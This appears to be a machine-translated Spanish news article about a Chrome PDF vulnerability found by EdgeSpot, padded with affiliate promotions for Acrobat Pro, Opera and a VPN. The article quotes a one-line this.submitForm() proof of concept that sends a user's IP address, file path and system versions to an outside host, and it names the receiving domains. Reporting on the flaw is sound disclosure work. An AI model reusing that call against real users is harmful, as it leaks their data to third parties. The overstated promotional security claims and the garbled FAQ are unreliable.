El error de Chrome permite a los piratas informáticos recopilar datos del usuario a través de archivos PDF

  • EdgeSpot descubrió una intrigante vulnerabilidad de día cero que explotaba documentos PDF en Chrome.
  • Esto vulnerabilidad puede dañarlo al recopilar datos confidenciales en su PC.
  • Explore nuestro Página web y en la nube para obtener más información sobre otras herramientas y servicios.
  • Si está interesado en los navegadores, le proporcionamos mucha información sobre ellos en nuestro Centro de navegadores.
El error de Chrome permite a los piratas informáticos recopilar datos de usuario de sus archivos PDF
¿Qué tal usar el mejor administrador de documentos?
Haga que todos sus documentos sean accesibles y seguros con Adobe Acrobat Reader. Esta herramienta de gestión de documentos también le permitirá firmar electrónicamente y crear formularios oficiales para ahorrar tiempo en el trabajo. Consíguelo para tu PC y podrás:
  • Abra, imprima y edite todos sus PDF y otros tipos de archivos
  • Rellene formularios PDF más fácilmente
  • Mantenga sus documentos esenciales encriptados

¡Obtén todas las aplicaciones a un precio especial!

El software de gestión de documentos número uno del mundo ahora tiene un precio excelente, ¡así que apúrate!

El servicio de detección de exploits EdgeSpot descubrió un intrigante Cromo vulnerabilidad de día cero que explota documentos PDF.

La vulnerabilidad permite a los atacantes recolectar datos sensibles utilizando documentos PDF maliciosos abiertos en Chrome.

Tan pronto como la víctima abre los respectivos archivos PDF en Google Chrome, un programa malicioso comienza a funcionar en segundo plano mediante la recopilación de datos del usuario.

Luego, los datos se envían al servidor remoto que está siendo controlado por los piratas informáticos. Es posible que se pregunte qué datos están siendo absorbidos por los atacantes, apuntan a los siguientes datos en su PC:

  • dirección IP
  • Ruta completa del archivo PDF en el sistema
  • Versiones de SO y Chrome

Tenga cuidado con los archivos PDF plagados de malware

Expertos manchado que uno de los dos dominios readnotify [.] comburpcollaborator [.] net estaba recibiendo los datos.

Revelaron que los atacantes están utilizando el this.submitForm () PDF Javascript API para recopilar la información sensible de los usuarios.

Lo probamos con un PoC mínimo, una simple llamada API como this.submitForm (‘ http://google.com/test’) hará que Google Chrome envíe los datos personales a google.com.

Este error de Chrome estaba siendo explotado por dos conjuntos distintos de archivos PDF maliciosos, ambos circularon en octubre de 2017 y septiembre de 2018, respectivamente.

En particular, los atacantes pueden utilizar los datos recopilados para ajustar los ataques en el futuro. Los informes sugieren que el primer lote de archivos se compiló utilizando el servicio de seguimiento de PDF de ReadNotify.

Los usuarios pueden utilizar el servicio para realizar un seguimiento de las vistas de los usuarios. EdgeSpot no ha compartido ningún detalle sobre la naturaleza del segundo conjunto de archivos PDF.

Consejo rápido: cambie su navegador a Opera

En estos tiempos difíciles, somos atacados con malware, phishing y troyanos en cada paso, por lo que tenemos que estar mucho más atentos y protegidos.

Y como este es un problema específico de Chrome, puede evitar esa amenaza y todas las demás con un navegador orientado a la seguridad como Ópera.

Este navegador viene con un bloqueador de anuncios incorporado que no solo elimina esas distracciones sino que también bloquea scripts de análisis, píxeles de seguimiento y métodos para recopilar sus datos.

Y si quiere estar absolutamente seguro de mantenerse alejado de cualquier peligro, colóquese detrás del VPN servicio que es 100% gratuito por tiempo ilimitado.

Ópera

Ópera

Opera ofrece la protección perfecta contra amenazas con el bloqueador de anuncios incorporado y el servicio VPN de forma gratuita.

Consíguelo gratis
Visita la página web

¿Cómo puedo protegerme de las vulnerabilidades de PDF?

Descarga Adobe Acrobat PRO

Adobe Acrobat PRO

Adobe y Chrome son una buena combinación cuando se trata de manejar archivos PDF. Al instalar Adobe Extension para Chrome, puede revisar y manipular archivos PDF a su gusto sin salir de su navegador favorito.

A pesar de su estructura sólida, es posible que el malware oculto en archivos PDF no se detecte si está utilizando la versión estándar del Reader.

Se recomienda la versión profesional para garantizar su protección y mantener sus datos alejados de los piratas informáticos.

Aunque no es gratis, el precio que pagará es bastante pequeño por la gran cantidad de funciones adicionales que disfrutará, incluida la seguridad mejorada de sus archivos PDF.

También se incluye una prueba gratuita de 7 días para que pueda probar la experiencia Pro completa antes de realizar la compra.

Adobe Acrobat PRO

Adobe Acrobat PRO

Manténgase alejado del malware descargando Adobe Acrobat PRO. Tiene muchas más funciones que la versión gratuita y mantiene sus datos seguros.

Prueba gratis
Visita la página web

En caso de que desee estar seguro mientras navega por Internet, deberá obtener una herramienta totalmente dedicada para proteger su red. Instale el acceso privado a Internet ahora y asegúrate. Protege su PC de ataques mientras navega, enmascara su dirección IP y bloquea todo acceso no deseado.


El servicio de detección de exploits EdgeSpot quería alertar a los usuarios de Chrome sobre los riesgos potenciales porque no se esperaba que el parche se lanzara en un futuro próximo.

EdgeSpot informó a Google sobre la vulnerabilidad el año pasado y la compañía prometió lanzar un parche a fines de abril.

Sin embargo, puede considerar utilizar una solución temporal al problema visualizando localmente los documentos PDF recibidos con otra aplicación de lectura.

Alternativamente, también puede abrir sus documentos PDF en Chrome desconectando sus sistemas de Internet.

Preguntas frecuentes

  • Sí, lo hace. Pero si desea una selección más amplia, explore nuestras mejores opciones para Cromointimidad extensiones en esta guía completa.

  • Taquí hay muchas extensiones que permiten Archivos PDF Procesando. Cheque fuera de nuestro excelente guía sobre las mejores extensiones de PDF para Chrome.

  • No es así, pero puedes activarlo rápidamente. Aquí está nuestro guía completa sobre cómo habilitar el generador de códigos QR en Chrome.

La nueva amenaza de phishing de Gmail podría poner en peligro millones de cuentas

La nueva amenaza de phishing de Gmail podría poner en peligro millones de cuentasLa Seguridad CibernéticaPhishing De Gmail

Se detectó una nueva iniciativa de suplantación de identidad en Google Gmail servicio y ha llamado la atención de los profesionales de seguridad, ya que muchos están cayendo en la trampa.Amenaza de...

Lee mas
5+ mejores antivirus con escáner USB para Windows 10

5+ mejores antivirus con escáner USB para Windows 10Escáner UsbAntivirusLa Seguridad Cibernética

Experiencia en software y hardware que ahorra tiempo y ayuda a 200 millones de usuarios al año. Guiándote con consejos prácticos, noticias y consejos para mejorar tu vida tecnológica.ESET Antivirus...

Lee mas
Las PC con Windows 10 apuntan a ataques de ransomware como servicio

Las PC con Windows 10 apuntan a ataques de ransomware como servicioSecuestro De DatosLa Seguridad Cibernética

Avaddon utiliza un programa afiliado de RaaS para entregar ransomware a usuarios desprevenidos de PC con Windows.Las víctimas tienen que pagar a Avaddon una tarifa de rescate para descifrar sus arc...

Lee mas